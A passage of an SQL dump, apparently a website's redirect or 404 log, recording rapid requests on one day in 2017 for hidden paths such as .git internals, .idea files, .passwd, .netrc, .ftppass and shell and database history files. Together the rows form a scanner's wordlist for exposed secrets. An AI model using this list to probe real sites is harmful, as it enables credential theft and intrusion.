00:00:00',301),(3711,'http://ekvatorprint.com.ua/.fhp',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3712,'http://ekvatorprint.com.ua/.filemgr-tmp',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3713,'http://ekvatorprint.com.ua/.fishsrv.pl',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3714,'http://ekvatorprint.com.ua/.forward',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3715,'http://ekvatorprint.com.ua/.fontcustom-manifest.json',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3716,'http://ekvatorprint.com.ua/.flowconfig',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3717,'http://ekvatorprint.com.ua/.flac',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3718,'http://ekvatorprint.com.ua/.fontconfig/',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3719,'http://ekvatorprint.com.ua/.ftpquota',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3720,'http://ekvatorprint.com.ua/.gbent',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3721,'http://ekvatorprint.com.ua/.gem',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3722,'http://ekvatorprint.com.ua/.git',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3723,'http://ekvatorprint.com.ua/.git-rewrite/',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3724,'http://ekvatorprint.com.ua/.git/FETCH_HEAD',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3725,'http://ekvatorprint.com.ua/.git/COMMIT_EDITMSG',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3726,'http://ekvatorprint.com.ua/.git/branches/',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3727,'http://ekvatorprint.com.ua/.git/description',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3728,'http://ekvatorprint.com.ua/.git/hooks/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3729,'http://ekvatorprint.com.ua/.git/info/exclude',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3730,'http://ekvatorprint.com.ua/.git/info/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3731,'http://ekvatorprint.com.ua/.git/index',NULL,'','',4,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3732,'http://ekvatorprint.com.ua/.git/logs/HEAD',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3733,'http://ekvatorprint.com.ua/.git/logs/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3734,'http://ekvatorprint.com.ua/.git/logs/refs',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3735,'http://ekvatorprint.com.ua/.git/logs/refs/heads',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3736,'http://ekvatorprint.com.ua/.git/logs/refs/heads/master',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3737,'http://ekvatorprint.com.ua/.git/logs/refs/remotes',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3738,'http://ekvatorprint.com.ua/.git/logs/refs/remotes/origin/HEAD',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3739,'http://ekvatorprint.com.ua/.git/logs/refs/remotes/origin',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3740,'http://ekvatorprint.com.ua/.git/logs/refs/remotes/origin/master',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3741,'http://ekvatorprint.com.ua/.git/objects/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3742,'http://ekvatorprint.com.ua/.git/packed-refs',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3743,'http://ekvatorprint.com.ua/.git/refs/heads/master',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3744,'http://ekvatorprint.com.ua/.git/refs/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3745,'http://ekvatorprint.com.ua/.git/refs/heads',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3746,'http://ekvatorprint.com.ua/.ftp-access',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3747,'http://ekvatorprint.com.ua/.git/refs/remotes',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3748,'http://ekvatorprint.com.ua/.git/refs/remotes/origin',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3749,'http://ekvatorprint.com.ua/.git/refs/remotes/origin/HEAD',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3750,'http://ekvatorprint.com.ua/.git/refs/tags',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3751,'http://ekvatorprint.com.ua/.git/refs/remotes/origin/master',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3752,'http://ekvatorprint.com.ua/.git2/',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3753,'http://ekvatorprint.com.ua/.git_release',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3754,'http://ekvatorprint.com.ua/.gitattributes',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3755,'http://ekvatorprint.com.ua/.gitconfig',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3756,'http://ekvatorprint.com.ua/.gitignore.swp',NULL,'','',1,0,'2017-01-20 13:26:24','0000-00-00 00:00:00',301),(3757,'http://ekvatorprint.com.ua/.gitignore_global',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3758,'http://ekvatorprint.com.ua/.gitignore~',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3759,'http://ekvatorprint.com.ua/.gitk',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3760,'http://ekvatorprint.com.ua/.gitkeep',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3761,'http://ekvatorprint.com.ua/.gitmodules',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3762,'http://ekvatorprint.com.ua/.gitreview',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3763,'http://ekvatorprint.com.ua/.grc',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3764,'http://ekvatorprint.com.ua/.grunt/',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3765,'http://ekvatorprint.com.ua/.gui',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3766,'http://ekvatorprint.com.ua/.hash',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3767,'http://ekvatorprint.com.ua/.gz',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3768,'http://ekvatorprint.com.ua/.hg',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3769,'http://ekvatorprint.com.ua/.hg/dirstate',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3770,'http://ekvatorprint.com.ua/.hg/',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3771,'http://ekvatorprint.com.ua/.hg/requires',NULL,'','',2,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3772,'http://ekvatorprint.com.ua/.hg/store/undo',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3773,'http://ekvatorprint.com.ua/.hg/store/data/',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3774,'http://ekvatorprint.com.ua/.hg/undo.dirstate',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3775,'http://ekvatorprint.com.ua/.hgrc',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3776,'http://ekvatorprint.com.ua/.hgignore.global',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3777,'http://ekvatorprint.com.ua/.hgignore',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3778,'http://ekvatorprint.com.ua/.history',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3779,'http://ekvatorprint.com.ua/.idea',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3780,'http://ekvatorprint.com.ua/.idea/',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3781,'http://ekvatorprint.com.ua/.idea/.name',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3782,'http://ekvatorprint.com.ua/.idea/Sites.iml',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3783,'http://ekvatorprint.com.ua/.idea/compiler.xml',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3784,'http://ekvatorprint.com.ua/.idea/copyright/profiles_settings.xml',NULL,'','',1,0,'2017-01-20 13:26:25','0000-00-00 00:00:00',301),(3785,'http://ekvatorprint.com.ua/.idea/dataSources.ids',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3786,'http://ekvatorprint.com.ua/.idea/dataSources.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3787,'http://ekvatorprint.com.ua/.idea/deployment.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3788,'http://ekvatorprint.com.ua/.idea/encodings.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3789,'http://ekvatorprint.com.ua/.idea/drush_stats.iml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3790,'http://ekvatorprint.com.ua/.idea/misc.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3791,'http://ekvatorprint.com.ua/.idea/modules.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3792,'http://ekvatorprint.com.ua/.idea/scopes/scope_settings.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3793,'http://ekvatorprint.com.ua/.idea/tasks.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3794,'http://ekvatorprint.com.ua/.idea/sqlDataSources.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3795,'http://ekvatorprint.com.ua/.idea/uiDesigner.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3796,'http://ekvatorprint.com.ua/.idea/vcs.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3797,'http://ekvatorprint.com.ua/.idea/woaWordpress.iml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3798,'http://ekvatorprint.com.ua/.idea/workspace(2).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3799,'http://ekvatorprint.com.ua/.idea/workspace(3).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3800,'http://ekvatorprint.com.ua/.idea/workspace(4).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3801,'http://ekvatorprint.com.ua/.idea/workspace(6).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3802,'http://ekvatorprint.com.ua/.idea/workspace(5).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3803,'http://ekvatorprint.com.ua/.idea/workspace(7).xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3804,'http://ekvatorprint.com.ua/.idea/workspace.xml',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3805,'http://ekvatorprint.com.ua/.idea_modules/',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3806,'http://ekvatorprint.com.ua/.idea0/',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3807,'http://ekvatorprint.com.ua/.ignore',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3808,'http://ekvatorprint.com.ua/.ignored/',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3809,'http://ekvatorprint.com.ua/.ftppass',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3810,'http://ekvatorprint.com.ua/.ini',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3811,'http://ekvatorprint.com.ua/.inst/',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3812,'http://ekvatorprint.com.ua/.install/composer.phar',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3813,'http://ekvatorprint.com.ua/.installed.cfg',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3814,'http://ekvatorprint.com.ua/.joe_state',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3815,'http://ekvatorprint.com.ua/.jpilot/',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3816,'http://ekvatorprint.com.ua/.jscsrc',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3817,'http://ekvatorprint.com.ua/.jshintignore',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3818,'http://ekvatorprint.com.ua/.jshintrc',NULL,'','',1,0,'2017-01-20 13:26:26','0000-00-00 00:00:00',301),(3819,'http://ekvatorprint.com.ua/.keep',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3820,'http://ekvatorprint.com.ua/.komodotools',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3821,'http://ekvatorprint.com.ua/.komodotools/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3822,'http://ekvatorprint.com.ua/.lesshst',NULL,'','',3,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3823,'http://ekvatorprint.com.ua/.lighttpd.conf',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3824,'http://ekvatorprint.com.ua/.listing',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3825,'http://ekvatorprint.com.ua/.listings',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3826,'http://ekvatorprint.com.ua/.loadpath',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3827,'http://ekvatorprint.com.ua/.localeapp/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3828,'http://ekvatorprint.com.ua/.local',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3829,'http://ekvatorprint.com.ua/.lock-wscript',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3830,'http://ekvatorprint.com.ua/.localsettings.php.swp',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3831,'http://ekvatorprint.com.ua/.log',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3832,'http://ekvatorprint.com.ua/.login_conf',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3833,'http://ekvatorprint.com.ua/.login',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3834,'http://ekvatorprint.com.ua/.lynx_cookies',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3835,'http://ekvatorprint.com.ua/.magentointel-cache/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3836,'http://ekvatorprint.com.ua/.mail_aliases',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3837,'http://ekvatorprint.com.ua/.maintenance',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3838,'http://ekvatorprint.com.ua/.maintenance2',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3839,'http://ekvatorprint.com.ua/.mc',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3840,'http://ekvatorprint.com.ua/.mc/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3841,'http://ekvatorprint.com.ua/.members',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3842,'http://ekvatorprint.com.ua/.meta',NULL,'','',2,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3843,'http://ekvatorprint.com.ua/.memdump',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3844,'http://ekvatorprint.com.ua/.mergesources.yml',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3845,'http://ekvatorprint.com.ua/.metadata',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3846,'http://ekvatorprint.com.ua/.metadata/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3847,'http://ekvatorprint.com.ua/.modgit/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3848,'http://ekvatorprint.com.ua/.modman/',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3849,'http://ekvatorprint.com.ua/.mr.developer.cfg',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3850,'http://ekvatorprint.com.ua/.msi',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3851,'http://ekvatorprint.com.ua/.modman',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3852,'http://ekvatorprint.com.ua/.mweval_history',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3853,'http://ekvatorprint.com.ua/.modules',NULL,'','',1,0,'2017-01-20 13:26:27','0000-00-00 00:00:00',301),(3854,'http://ekvatorprint.com.ua/.mwsql_history',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3855,'http://ekvatorprint.com.ua/.nbproject/',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3856,'http://ekvatorprint.com.ua/.mysql_history',NULL,'','',4,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3857,'http://ekvatorprint.com.ua/.netrc',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3858,'http://ekvatorprint.com.ua/.nodelete',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3859,'http://ekvatorprint.com.ua/.net/',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3860,'http://ekvatorprint.com.ua/.netrwhist',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3861,'http://ekvatorprint.com.ua/.npmignore',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3862,'http://ekvatorprint.com.ua/.nsconfig',NULL,'','',2,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3863,'http://ekvatorprint.com.ua/.old',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3864,'http://ekvatorprint.com.ua/.org-id-locations',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3865,'http://ekvatorprint.com.ua/.oldsnippets',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3866,'http://ekvatorprint.com.ua/.oldstatic',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3867,'http://ekvatorprint.com.ua/.ost',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3868,'http://ekvatorprint.com.ua/.pass',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3869,'http://ekvatorprint.com.ua/.passes',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3870,'http://ekvatorprint.com.ua/.mailrc',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3871,'http://ekvatorprint.com.ua/.passwd/',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3872,'http://ekvatorprint.com.ua/.passwd',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3873,'http://ekvatorprint.com.ua/.password',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3874,'http://ekvatorprint.com.ua/.passwrd',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3875,'http://ekvatorprint.com.ua/.patches/',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3876,'http://ekvatorprint.com.ua/.passwords',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3877,'http://ekvatorprint.com.ua/.perf',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3878,'http://ekvatorprint.com.ua/.php-ini',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3879,'http://ekvatorprint.com.ua/.php-version',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3880,'http://ekvatorprint.com.ua/.phptidy-cache',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3881,'http://ekvatorprint.com.ua/.phpintel',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3882,'http://ekvatorprint.com.ua/.php_history',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3883,'http://ekvatorprint.com.ua/.phpstorm.meta.php',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3884,'http://ekvatorprint.com.ua/.phpversion',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3885,'http://ekvatorprint.com.ua/.placeholder',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3886,'http://ekvatorprint.com.ua/.pki',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3887,'http://ekvatorprint.com.ua/.procmailrc',NULL,'','',1,0,'2017-01-20 13:26:28','0000-00-00 00:00:00',301),(3888,'http://ekvatorprint.com.ua/.printer',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3889,'http://ekvatorprint.com.ua/.project',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3890,'http://ekvatorprint.com.ua/.project.xml',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3891,'http://ekvatorprint.com.ua/.profile',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3892,'http://ekvatorprint.com.ua/.psql_history',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3893,'http://ekvatorprint.com.ua/.properties',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3894,'http://ekvatorprint.com.ua/.projectOptions',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3895,'http://ekvatorprint.com.ua/.project/',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3896,'http://ekvatorprint.com.ua/.pst',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3897,'http://ekvatorprint.com.ua/.pwd',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3898,'http://ekvatorprint.com.ua/.rar',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3899,'http://ekvatorprint.com.ua/.python-eggs',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3900,'http://ekvatorprint.com.ua/.pydevproject',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3901,'http://ekvatorprint.com.ua/.qqestore/',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3902,'http://ekvatorprint.com.ua/.raw',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3903,'http://ekvatorprint.com.ua/.remote-sync.json',NULL,'','',10,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3904,'http://ekvatorprint.com.ua/.rbtp',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3905,'http://ekvatorprint.com.ua/.rdsTempFiles',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3906,'http://ekvatorprint.com.ua/.rhosts',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3907,'http://ekvatorprint.com.ua/.revision',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3908,'http://ekvatorprint.com.ua/.rsync_cache/',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3909,'http://ekvatorprint.com.ua/.robots.txt',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3910,'http://ekvatorprint.com.ua/.rsync_cache',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3911,'http://ekvatorprint.com.ua/.rubocop.yml',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3912,'http://ekvatorprint.com.ua/.rubocop_todo.yml',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3913,'http://ekvatorprint.com.ua/.ruby-gemset',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3914,'http://ekvatorprint.com.ua/.ruby-version',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3915,'http://ekvatorprint.com.ua/.rvmrc',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3916,'http://ekvatorprint.com.ua/.sass-cache/',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3917,'http://ekvatorprint.com.ua/.s3backupstatus',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3918,'http://ekvatorprint.com.ua/.server-info/',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3919,'http://ekvatorprint.com.ua/.selected_editor',NULL,'','',1,0,'2017-01-20 13:26:29','0000-00-00 00:00:00',301),(3920,'http://ekvatorprint.com.ua/.server-status/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3921,'http://ekvatorprint.com.ua/.sessions',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3922,'http://ekvatorprint.com.ua/.settings/.jsdtscope',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3923,'http://ekvatorprint.com.ua/.settings.php.swp',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3924,'http://ekvatorprint.com.ua/.settings/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3925,'http://ekvatorprint.com.ua/.settings',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3926,'http://ekvatorprint.com.ua/.settings/org.eclipse.php.core.prefs',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3927,'http://ekvatorprint.com.ua/.settings/org.eclipse.wst.common.project.facet.core.xml',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3928,'http://ekvatorprint.com.ua/.settings/org.eclipse.core.resources.prefs',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3929,'http://ekvatorprint.com.ua/.settings/org.eclipse.wst.jsdt.ui.superType.container',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3930,'http://ekvatorprint.com.ua/.settings/org.eclipse.wst.jsdt.ui.superType.name',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3931,'http://ekvatorprint.com.ua/.sh',NULL,'','',1,0,'2017-01-20 